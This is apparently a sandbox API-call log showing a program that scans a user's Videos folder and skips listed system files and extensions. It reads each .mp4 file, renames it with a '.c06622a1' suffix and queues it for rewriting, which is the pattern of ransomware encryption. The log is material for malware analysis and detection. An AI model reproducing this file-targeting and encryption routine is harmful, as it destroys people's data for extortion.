returned 8 [0168.680] wcsstr (_Str="Z-F8O23mq.mp4", _SubStr="README") returned 0x0 [0168.680] _wcsicmp (_Str1="autorun.inf", _Str2="Z-F8O23mq.mp4") returned -25 [0168.680] wcslen (_String="autorun.inf") returned 0xb [0168.680] _wcsicmp (_Str1="boot.ini", _Str2="Z-F8O23mq.mp4") returned -24 [0168.680] wcslen (_String="boot.ini") returned 0x8 [0168.680] _wcsicmp (_Str1="bootfont.bin", _Str2="Z-F8O23mq.mp4") returned -24 [0168.680] wcslen (_String="bootfont.bin") returned 0xc [0168.680] _wcsicmp (_Str1="bootsect.bak", _Str2="Z-F8O23mq.mp4") returned -24 [0168.680] wcslen (_String="bootsect.bak") returned 0xc [0168.680] _wcsicmp (_Str1="desktop.ini", _Str2="Z-F8O23mq.mp4") returned -22 [0168.680] wcslen (_String="desktop.ini") returned 0xb [0168.680] _wcsicmp (_Str1="iconcache.db", _Str2="Z-F8O23mq.mp4") returned -17 [0168.680] wcslen (_String="iconcache.db") returned 0xc [0168.680] _wcsicmp (_Str1="ntldr", _Str2="Z-F8O23mq.mp4") returned -12 [0168.680] wcslen (_String="ntldr") returned 0x5 [0168.680] _wcsicmp (_Str1="ntuser.dat", _Str2="Z-F8O23mq.mp4") returned -12 [0168.680] wcslen (_String="ntuser.dat") returned 0xa [0168.680] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Z-F8O23mq.mp4") returned -12 [0168.680] wcslen (_String="ntuser.dat.log") returned 0xe [0168.680] _wcsicmp (_Str1="ntuser.ini", _Str2="Z-F8O23mq.mp4") returned -12 [0168.680] wcslen (_String="ntuser.ini") returned 0xa [0168.680] _wcsicmp (_Str1="thumbs.db", _Str2="Z-F8O23mq.mp4") returned -6 [0168.680] wcslen (_String="thumbs.db") returned 0x9 [0168.680] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0168.680] wcslen (_String="386") returned 0x3 [0168.680] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0168.681] wcslen (_String="adv") returned 0x3 [0168.681] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0168.681] wcslen (_String="ani") returned 0x3 [0168.681] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0168.681] wcslen (_String="bat") returned 0x3 [0168.681] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0168.681] wcslen (_String="bin") returned 0x3 [0168.681] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0168.681] wcslen (_String="cab") returned 0x3 [0168.681] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0168.681] wcslen (_String="cmd") returned 0x3 [0168.681] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0168.681] wcslen (_String="com") returned 0x3 [0168.681] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0168.681] wcslen (_String="cpl") returned 0x3 [0168.681] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0168.681] wcslen (_String="cur") returned 0x3 [0168.681] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0168.681] wcslen (_String="deskthemepack") returned 0xd [0168.681] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0168.681] wcslen (_String="diagcab") returned 0x7 [0168.681] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0168.681] wcslen (_String="diagcfg") returned 0x7 [0168.681] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0168.681] wcslen (_String="diagpkg") returned 0x7 [0168.681] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0168.681] wcslen (_String="dll") returned 0x3 [0168.682] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0168.682] wcslen (_String="drv") returned 0x3 [0168.682] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0168.682] wcslen (_String="exe") returned 0x3 [0168.682] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0168.682] wcslen (_String="hlp") returned 0x3 [0168.682] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0168.682] wcslen (_String="icl") returned 0x3 [0168.682] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0168.682] wcslen (_String="icns") returned 0x4 [0168.682] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0168.682] wcslen (_String="ico") returned 0x3 [0168.682] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0168.682] wcslen (_String="ics") returned 0x3 [0168.682] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0168.682] wcslen (_String="idx") returned 0x3 [0168.682] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0168.682] wcslen (_String="ldf") returned 0x3 [0168.682] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0168.682] wcslen (_String="lnk") returned 0x3 [0168.682] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0168.682] wcslen (_String="mod") returned 0x3 [0168.682] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0168.682] wcslen (_String="mpa") returned 0x3 [0168.682] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0168.682] wcslen (_String="msc") returned 0x3 [0168.682] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0168.683] wcslen (_String="msp") returned 0x3 [0168.683] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0168.683] wcslen (_String="msstyles") returned 0x8 [0168.683] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0168.683] wcslen (_String="msu") returned 0x3 [0168.683] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0168.683] wcslen (_String="nls") returned 0x3 [0168.683] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0168.683] wcslen (_String="nomedia") returned 0x7 [0168.683] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0168.683] wcslen (_String="ocx") returned 0x3 [0168.683] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0168.683] wcslen (_String="prf") returned 0x3 [0168.683] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0168.683] wcslen (_String="ps1") returned 0x3 [0168.683] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0168.683] wcslen (_String="rom") returned 0x3 [0168.683] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0168.683] wcslen (_String="rtp") returned 0x3 [0168.683] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0168.683] wcslen (_String="scr") returned 0x3 [0168.683] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0168.683] wcslen (_String="shs") returned 0x3 [0168.683] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0168.683] wcslen (_String="spl") returned 0x3 [0168.683] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0168.683] wcslen (_String="sys") returned 0x3 [0168.684] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0168.684] wcslen (_String="theme") returned 0x5 [0168.684] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0168.684] wcslen (_String="themepack") returned 0x9 [0168.684] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0168.684] wcslen (_String="wpx") returned 0x3 [0168.684] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0168.684] wcslen (_String="lock") returned 0x4 [0168.684] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0168.684] wcslen (_String="key") returned 0x3 [0168.684] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0168.684] wcslen (_String="hta") returned 0x3 [0168.684] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0168.684] wcslen (_String="msi") returned 0x3 [0168.684] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0168.684] wcslen (_String="pdb") returned 0x3 [0168.684] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0168.684] wcslen (_String="sqlite") returned 0x6 [0168.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg")) returned 0x10 [0168.684] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.684] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" [0168.684] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned 0x36 [0168.684] wcscpy (in: _Dest=0x32400ce, _Source="Z-F8O23mq.mp4" | out: _Dest="Z-F8O23mq.mp4") returned="Z-F8O23mq.mp4" [0168.685] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\Z-F8O23mq.mp4", dwFileAttributes=0x80) returned 1 [0168.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\Z-F8O23mq.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\z-f8o23mq.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0168.706] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.706] ReadFile (in: hFile=0x1fc, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.707] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xa578c69e [0168.707] RtlComputeCrc32 (PartialCrc=0xc69e, Buffer=0x32e9a4, Length=0x80) returned 0x6dadc6fa [0168.707] RtlComputeCrc32 (PartialCrc=0xc6fa, Buffer=0x32e9a4, Length=0x80) returned 0x64bdbc2c [0168.707] RtlComputeCrc32 (PartialCrc=0xbc2c, Buffer=0x32e9a4, Length=0x80) returned 0x7f7c8d9a [0168.707] RtlComputeCrc32 (PartialCrc=0x8d9a, Buffer=0x32e9a4, Length=0x80) returned 0x37112648 [0168.707] CloseHandle (hObject=0x1fc) returned 1 [0168.707] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.707] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\Z-F8O23mq.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\Z-F8O23mq.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\Z-F8O23mq.mp4" [0168.707] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\Z-F8O23mq.mp4") returned 0x44 [0168.707] wcscpy (in: _Dest=0x32500f0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.707] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\Z-F8O23mq.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\z-f8o23mq.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\Z-F8O23mq.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\z-f8o23mq.mp4.c06622a1"), dwFlags=0x8) returned 1 [0168.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\Z-F8O23mq.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\z-f8o23mq.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x194 [0168.717] CreateIoCompletionPort (FileHandle=0x194, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.718] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x4130020 [0168.727] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x78e43b59 [0168.728] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6c6a5b76 [0168.728] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2be51703 [0168.728] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x68a133dc [0168.728] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x51f46528 [0168.728] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x100f85c9 [0168.728] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1f30da32 [0168.728] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x722a250 [0168.731] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4130094, Length=0x80) returned 0x90307e22 [0168.731] RtlComputeCrc32 (PartialCrc=0x7e22, Buffer=0x4130094, Length=0x80) returned 0x2e77efcf [0168.731] RtlComputeCrc32 (PartialCrc=0xefcf, Buffer=0x4130094, Length=0x80) returned 0x47cec813 [0168.731] RtlComputeCrc32 (PartialCrc=0xc813, Buffer=0x4130094, Length=0x80) returned 0x8e78accb [0168.731] RtlComputeCrc32 (PartialCrc=0xaccb, Buffer=0x4130094, Length=0x80) returned 0x5c2f54c4 [0168.731] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4130020) returned 1 [0168.731] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.731] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.731] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6caa89a0, ftCreationTime.dwHighDateTime=0x1d5e42b, ftLastAccessTime.dwLowDateTime=0xf4152d0, ftLastAccessTime.dwHighDateTime=0x1d5db7a, ftLastWriteTime.dwLowDateTime=0xf4152d0, ftLastWriteTime.dwHighDateTime=0x1d5db7a, nFileSizeHigh=0x0, nFileSizeLow=0x1789b, dwReserved0=0x0, dwReserved1=0x0, cFileName="z5UR8v_xI.mp4", cAlternateFileName="Z5UR8V~1.MP4")) returned 1 [0168.732] _wcsicmp (_Str1="z5UR8v_xI.mp4", _Str2="README.c06622a1.TXT") returned 8 [0168.732] wcsstr (_Str="z5UR8v_xI.mp4", _SubStr="README") returned 0x0 [0168.732] _wcsicmp (_Str1="autorun.inf", _Str2="z5UR8v_xI.mp4") returned -25 [0168.732] wcslen (_String="autorun.inf") returned 0xb [0168.732] _wcsicmp (_Str1="boot.ini", _Str2="z5UR8v_xI.mp4") returned -24 [0168.732] wcslen (_String="boot.ini") returned 0x8 [0168.732] _wcsicmp (_Str1="bootfont.bin", _Str2="z5UR8v_xI.mp4") returned -24 [0168.732] wcslen (_String="bootfont.bin") returned 0xc [0168.732] _wcsicmp (_Str1="bootsect.bak", _Str2="z5UR8v_xI.mp4") returned -24 [0168.732] wcslen (_String="bootsect.bak") returned 0xc [0168.732] _wcsicmp (_Str1="desktop.ini", _Str2="z5UR8v_xI.mp4") returned -22 [0168.732] wcslen (_String="desktop.ini") returned 0xb [0168.732] _wcsicmp (_Str1="iconcache.db", _Str2="z5UR8v_xI.mp4") returned -17 [0168.732] wcslen (_String="iconcache.db") returned 0xc [0168.732] _wcsicmp (_Str1="ntldr", _Str2="z5UR8v_xI.mp4") returned -12 [0168.732] wcslen (_String="ntldr") returned 0x5 [0168.732] _wcsicmp (_Str1="ntuser.dat", _Str2="z5UR8v_xI.mp4") returned -12 [0168.732] wcslen (_String="ntuser.dat") returned 0xa [0168.732] _wcsicmp (_Str1="ntuser.dat.log", _Str2="z5UR8v_xI.mp4") returned -12 [0168.733] wcslen (_String="ntuser.dat.log") returned 0xe [0168.733] _wcsicmp (_Str1="ntuser.ini", _Str2="z5UR8v_xI.mp4") returned -12 [0168.733] wcslen (_String="ntuser.ini") returned 0xa [0168.733] _wcsicmp (_Str1="thumbs.db", _Str2="z5UR8v_xI.mp4") returned -6 [0168.733] wcslen (_String="thumbs.db") returned 0x9 [0168.733] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0168.733] wcslen (_String="386") returned 0x3 [0168.733] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0168.733] wcslen (_String="adv") returned 0x3 [0168.733] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0168.733] wcslen (_String="ani") returned 0x3 [0168.733] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0168.733] wcslen (_String="bat") returned 0x3 [0168.733] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0168.733] wcslen (_String="bin") returned 0x3 [0168.733] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0168.733] wcslen (_String="cab") returned 0x3 [0168.733] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0168.733] wcslen (_String="cmd") returned 0x3 [0168.734] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0168.734] wcslen (_String="com") returned 0x3 [0168.734] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0168.734] wcslen (_String="cpl") returned 0x3 [0168.734] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0168.734] wcslen (_String="cur") returned 0x3 [0168.734] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0168.734] wcslen (_String="deskthemepack") returned 0xd [0168.734] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0168.734] wcslen (_String="diagcab") returned 0x7 [0168.734] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0168.734] wcslen (_String="diagcfg") returned 0x7 [0168.734] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0168.734] wcslen (_String="diagpkg") returned 0x7 [0168.734] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0168.734] wcslen (_String="dll") returned 0x3 [0168.734] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0168.734] wcslen (_String="drv") returned 0x3 [0168.734] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0168.735] wcslen (_String="exe") returned 0x3 [0168.735] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0168.735] wcslen (_String="hlp") returned 0x3 [0168.735] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0168.735] wcslen (_String="icl") returned 0x3 [0168.735] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0168.735] wcslen (_String="icns") returned 0x4 [0168.735] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0168.735] wcslen (_String="ico") returned 0x3 [0168.735] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0168.735] wcslen (_String="ics") returned 0x3 [0168.735] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0168.735] wcslen (_String="idx") returned 0x3 [0168.735] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0168.735] wcslen (_String="ldf") returned 0x3 [0168.735] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0168.735] wcslen (_String="lnk") returned 0x3 [0168.735] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0168.735] wcslen (_String="mod") returned 0x3 [0168.735] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0168.736] wcslen (_String="mpa") returned 0x3 [0168.736] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0168.736] wcslen (_String="msc") returned 0x3 [0168.736] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0168.736] wcslen (_String="msp") returned 0x3 [0168.736] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0168.736] wcslen (_String="msstyles") returned 0x8 [0168.736] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0168.736] wcslen (_String="msu") returned 0x3 [0168.736] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0168.736] wcslen (_String="nls") returned 0x3 [0168.736] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0168.736] wcslen (_String="nomedia") returned 0x7 [0168.736] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0168.736] wcslen (_String="ocx") returned 0x3 [0168.736] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0168.736] wcslen (_String="prf") returned 0x3 [0168.736] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0168.736] wcslen (_String="ps1") returned 0x3 [0168.736] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0168.737] wcslen (_String="rom") returned 0x3 [0168.737] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0168.737] wcslen (_String="rtp") returned 0x3 [0168.737] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0168.737] wcslen (_String="scr") returned 0x3 [0168.737] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0168.737] wcslen (_String="shs") returned 0x3 [0168.737] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0168.737] wcslen (_String="spl") returned 0x3 [0168.737] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0168.737] wcslen (_String="sys") returned 0x3 [0168.737] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0168.737] wcslen (_String="theme") returned 0x5 [0168.737] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0168.737] wcslen (_String="themepack") returned 0x9 [0168.737] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0168.737] wcslen (_String="wpx") returned 0x3 [0168.737] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0168.737] wcslen (_String="lock") returned 0x4 [0168.737] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0168.738] wcslen (_String="key") returned 0x3 [0168.738] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0168.738] wcslen (_String="hta") returned 0x3 [0168.738] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0168.738] wcslen (_String="msi") returned 0x3 [0168.738] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0168.738] wcslen (_String="pdb") returned 0x3 [0168.738] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0168.738] wcslen (_String="sqlite") returned 0x6 [0168.738] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg")) returned 0x10 [0168.738] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.738] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" [0168.738] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned 0x36 [0168.738] wcscpy (in: _Dest=0x32400ce, _Source="z5UR8v_xI.mp4" | out: _Dest="z5UR8v_xI.mp4") returned="z5UR8v_xI.mp4" [0168.738] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\z5UR8v_xI.mp4", dwFileAttributes=0x80) returned 1 [0168.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\z5UR8v_xI.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\z5ur8v_xi.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0168.792] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.792] ReadFile (in: hFile=0x1c8, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.792] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x6b7900b5 [0168.793] RtlComputeCrc32 (PartialCrc=0xb5, Buffer=0x32e9a4, Length=0x80) returned 0xd7bc7d90 [0168.793] RtlComputeCrc32 (PartialCrc=0x7d90, Buffer=0x32e9a4, Length=0x80) returned 0x36802de7 [0168.793] RtlComputeCrc32 (PartialCrc=0x2de7, Buffer=0x32e9a4, Length=0x80) returned 0x4619b5e6 [0168.793] RtlComputeCrc32 (PartialCrc=0xb5e6, Buffer=0x32e9a4, Length=0x80) returned 0x259c2af0 [0168.793] CloseHandle (hObject=0x1c8) returned 1 [0168.793] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.793] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\z5UR8v_xI.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\z5UR8v_xI.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\z5UR8v_xI.mp4" [0168.793] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\z5UR8v_xI.mp4") returned 0x44 [0168.793] wcscpy (in: _Dest=0x32500f0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.793] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\z5UR8v_xI.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\z5ur8v_xi.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\z5UR8v_xI.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\z5ur8v_xi.mp4.c06622a1"), dwFlags=0x8) returned 1 [0168.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\z5UR8v_xI.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\z5ur8v_xi.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c8 [0168.867] CreateIoCompletionPort (FileHandle=0x1c8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0168.867] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0168.871] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x631a4068 [0168.871] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x8277866 [0168.871] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x131bbf52 [0168.871] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6f14ef6e [0168.871] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1686bbe7 [0168.871] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2216474c [0168.871] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x16b236ff [0168.871] 